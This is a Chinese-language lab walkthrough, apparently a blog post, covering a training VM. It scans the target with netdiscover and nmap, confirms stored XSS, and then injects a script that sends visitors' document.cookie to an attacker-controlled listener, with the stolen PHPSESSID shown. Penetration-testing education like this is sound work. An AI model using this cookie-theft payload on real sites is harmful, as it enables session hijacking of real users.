XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10

1、使用VMware开启 xss_and_mysql_file 环境并查看靶机的IP,开启kali

2、kali中使用  netdiscover -r 192.168.174.0/24  指令扫描开放的IP,搜索到了靶机IP为192.168.174.137

3、kali中使用  nmap -sC -sV -p- 192.168.174.137 -n -vv --min-rate=2000  指令扫描192.168.174.137的端口,发现靶机开放了22端口有OpenSSH 5.5p1、80端口有Apache

4、访问一下 192.168.174.137,查看一下网页,发现可以写内容,尝试随意写点数据

        

5、查看网页源码发现了我们写入的内容,这里可能存在XSS漏洞 

6、尝试写入    <script>alert('1+1')</script>  指令,发现出现弹窗,这说明这里存在XSS漏洞

7、重启 xss_and_mysql_file虚拟机把数据还原到原始状态,重新进入192.168.174.137网页

8、在kali中开启对80端口的监听,输入   python3 -m http.server 80   指令

9、输入进行XSS注入用来盗取取cookie 输入

 <script>new Image().src="http://192.168.174.129/test.php?o="+document.cookie;</script>  进行注入,查看监听的80端口获得了cookei,复制 output=PHPSESSID=ea7c9v0cajgip3e5usrcjfai57

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值